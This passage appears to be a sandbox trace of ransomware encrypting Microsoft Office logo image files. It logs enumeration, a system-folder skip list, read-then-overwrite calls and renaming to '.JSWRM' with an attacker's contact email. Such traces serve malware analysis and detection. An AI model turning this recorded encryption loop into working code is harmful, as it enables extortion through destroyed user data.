cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.799] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1594) returned 1 [0133.799] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.799] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0133.801] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.801] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0133.801] CloseHandle (hObject=0x238) returned 1 [0133.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.802] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x764, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.scale-100.png", cAlternateFileName="PO420E~1.PNG")) returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2=".") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="..") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="...") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="windows") returned -1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="perflogs") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0133.802] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x241358, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.803] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1892) returned 1 [0133.804] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.804] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0133.805] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.805] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0133.806] CloseHandle (hObject=0x238) returned 1 [0133.806] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.807] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x853, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.scale-140.png", cAlternateFileName="PO003F~1.PNG")) returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2=".") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="..") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="...") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="windows") returned -1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="perflogs") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0133.807] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-140.png", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 31 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.808] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2131) returned 1 [0133.808] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.808] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x850, lpOverlapped=0x0) returned 1 [0133.810] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.810] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x850, lpOverlapped=0x0) returned 1 [0133.810] CloseHandle (hObject=0x238) returned 1 [0133.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.811] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ea, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.scale-180.png", cAlternateFileName="PO5DB3~1.PNG")) returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="perflogs") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0133.811] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x241100, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.812] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2538) returned 1 [0133.812] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9e0, lpOverlapped=0x0) returned 1 [0133.814] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.814] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9e0, lpOverlapped=0x0) returned 1 [0133.814] CloseHandle (hObject=0x238) returned 1 [0133.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.815] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogoSmall.scale-80.png", cAlternateFileName="PO2503~1.PNG")) returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="perflogs") returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.815] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.816] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0133.816] lstrcmpiW (lpString1="PowerPntLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.817] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1675) returned 1 [0133.817] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.817] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x680, lpOverlapped=0x0) returned 1 [0133.818] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.818] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x680, lpOverlapped=0x0) returned 1 [0133.819] CloseHandle (hObject=0x238) returned 1 [0133.819] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.820] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x96a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-black_scale-100.png", cAlternateFileName="VI0946~1.PNG")) returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0133.820] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-100.png", cchWideChar=38, 